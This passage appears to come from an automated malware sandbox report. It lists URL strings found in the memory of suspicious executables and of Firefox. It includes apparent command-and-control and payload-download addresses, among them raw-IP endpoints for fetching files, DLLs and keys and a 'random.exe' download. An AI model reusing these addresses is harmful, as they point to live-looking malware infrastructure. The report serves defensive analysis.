Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/D
Source: skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000011.00000002.3331222029.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5001
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpP
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpta
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ta
Source: skotes.exe, 00000011.00000002.3331222029.0000000001628000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exea
Source: 2533b4b8c7.exe, 00000012.00000003.3231623232.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3309348955.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3257366265.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3283675560.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.
Source: 2533b4b8c7.exe, 00000012.00000003.3206055085.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp8P
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/add?substr=mixtwo&s=three&sub=empj
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.000000000101B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/download
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.000000000101B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/downloadVZ
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/downloadhqos.dll.mui
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000001008000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key&X
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000001008000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dll/key8t
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.0000000005690000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/dows
Source: 2533b4b8c7.exe, 00000012.00000003.3231623232.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3309348955.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3257366265.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3283675560.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056A0000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3177154746.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3257366265.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3283675560.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download&:
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download0/files/downloadShel
Source: 2533b4b8c7.exe, 00000012.00000003.3206055085.00000000058CE000.00000004.00000020.00020000.00000000.sdmp, 2533b4b8c7.exe, 00000012.00000003.3177154746.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download:
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadBROW
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadMicr
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadN=
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadSys&
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/download_REV
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadault
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadcal
Source: 2533b4b8c7.exe, 00000012.00000003.3283675560.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadd
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadh=%P
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadl
Source: 2533b4b8c7.exe, 00000012.00000002.3325397739.0000000000F69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadogra
Source: 2533b4b8c7.exe, 00000012.00000002.3342180435.00000000056AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/files/downloadv=kn
Source: 2533b4b8c7.exe, 00000012.00000003.3309348955.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.70/filesl
Source: 2533b4b8c7.exe, 00000012.00000003.3309348955.00000000058CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://80.82.65.g
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3201091459.00000132C3CD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000023.00000003.3140371807.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261062715.00000132BA4DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://poczt
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: feb3d39b6a.exe, 00000013.00000003.3005610732.0000000005613000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3208690769.00000000056A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3C48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA737000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3260198511.00000132BA20F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3312097959.00000132C4260000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3237958152.00000132AA8D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3203625245.00000132BBDC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000023.00000002.3304363170.00000132C3C48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000023.00000002.3289593951.00000132BD2C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3208033913.00000132C3C66000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3261762897.00000132BA793000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C65000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3202991056.00000132C3C69000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENTlogin
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227898022.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3242416997.00000132B61F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3227898022.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3282517712.00000132BBDB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3209291549.00000132C23A5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 00000023.00000002.3283630557.00000132BCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 00000023.00000002.3265189555.00000132BACA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB365000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#-
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3268750012.00000132BB17B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3317389275.000039F659F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3316055038.000004E319904000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledawesome-bar-result-menu-rollout-phase-1
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3270548472.00000132BB37B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/boolean
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/startDate
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsmoz-extension://6290
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsmoz-extension://2f55
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/23eec18fa-2067-4082-925e-9c8a7241148b
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreloadEnabledfeatureUpdate:searchConfiguration
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
